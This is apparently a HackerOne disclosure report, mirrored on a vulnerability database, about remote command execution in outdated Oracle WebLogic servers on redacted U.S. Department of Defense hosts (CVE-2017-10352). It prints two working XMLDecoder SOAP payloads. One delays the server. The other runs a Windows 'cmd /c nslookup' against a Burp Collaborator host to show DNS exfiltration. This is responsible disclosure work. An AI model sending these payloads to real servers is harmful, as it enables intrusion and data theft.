Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneSp1d3rsH1:634630
HistoryJul 03, 2019 - 7:21 p.m.

U.S. Dept Of Defense: Remote OS command Execution in the 3 more Oracle Weblogic on the ████████, ████, ███████ [CVE-2017-10352]

2019-07-0319:21:18
sp1d3rs
hackerone.com
34

0.001 Low

EPSS

Percentile

39.9%

JSON

##Description
Hello. I was able to identify 3 more RCE vulnerabilities due to the outdated Oracle Weblogic instance on the █████████, ███, █████
After my previous discoveries I decided to dig deeper into the ███.mil scope/IP space and found other instances of vulnerable Oracle WebLogic. I decided to fill all this additional findings in the single report

##POC
This request to the https://█████████/wls-wsat/CoordinatorPortType will trigger sleep for 10 seconds (same applies for ████████, ███████):

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: █████████
Content-Length: 423
content-type: text/xml
Accept-Encoding: gzip, deflate, compress
Accept: */*

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java class="java.beans.XMLDecoder">
        <object class="java.lang.Thread" method="sleep">
          <long>10000</long>
        </object>
      </java>  
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

The next request will resolve custom Burp Collaborator hostname via nslookup OS command to prove that it’s possible to exfiltrate data via DNS:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: ███
Content-Length: 724
content-type: text/xml
Accept-Encoding: gzip, deflate, compress
Accept: */*

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
	<soapenv:Header>
		<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
			<java version="1.8.0_151" class="java.beans.XMLDecoder"> 
			<void class="java.lang.ProcessBuilder"> 
				<array class="java.lang.String" length="3">
				<void index = "0">
					<string>cmd</string>
				</void>
				<void index = "1"> 
					<string>/c</string> 
				</void>
				<void index = "2">
					<string>nslookup j3nxpi8ecz9uznkpu32mb7pj9af13q.burpcollaborator.net</string>
				</void>
			</array>
			<void method="start"/>
			</void>
			</java>
			</work:WorkContext> 
	</soapenv:Header> 
<soapenv:Body/>
</soapenv:Envelope>

Note: to reproduce the second case with nslookup, j3nxpi8ecz9uznkpu32mb7pj9af13q.burpcollaborator.net host should be replaced by your own Burp Collaborator instance to catch the DNS request

##Suggested fix
Patching WebLogic to the resent version will fix the issue.

Impact

Remote OS command execution.

Related

nvd 1
prion 1
cve 1
cvelist 1
nessus 4
openvas 1
oracle 2
nvd
nvd
CVE-2017-10352
2017-10-19 17:29:04
prion
prion
Design/Logic Flaw
2017-10-19 17:29:00
cve
cve
CVE-2017-10352
2017-10-19 17:29:04
cvelist
cvelist
CVE-2017-10352
2017-10-19 17:00:00
nessus
nessus
Oracle WebLogic Server Multiple Vulnerabilities (Jan 2018 CPU)
2020-12-16 00:00:00
Oracle WebLogic Server Multiple Vulnerabilities (October 2017 CPU)
2017-10-18 00:00:00
Oracle Fusion Middleware Oracle HTTP Server Multiple Vulnerabilities (January 2018 CPU)
2018-01-24 00:00:00
openvas
openvas
Oracle WebLogic Server Multiple Vulnerabilities (cpujul2017-3236622)
2017-07-19 00:00:00
oracle
oracle
Oracle Critical Patch Update - January 2018
2018-01-16 00:00:00
Oracle Critical Patch Update - October 2017
2017-10-17 00:00:00

0.001 Low

EPSS

Percentile

39.9%

JSON
Related for H1:634630
nvd1prion1cve1cvelist1nessus4openvas1oracle2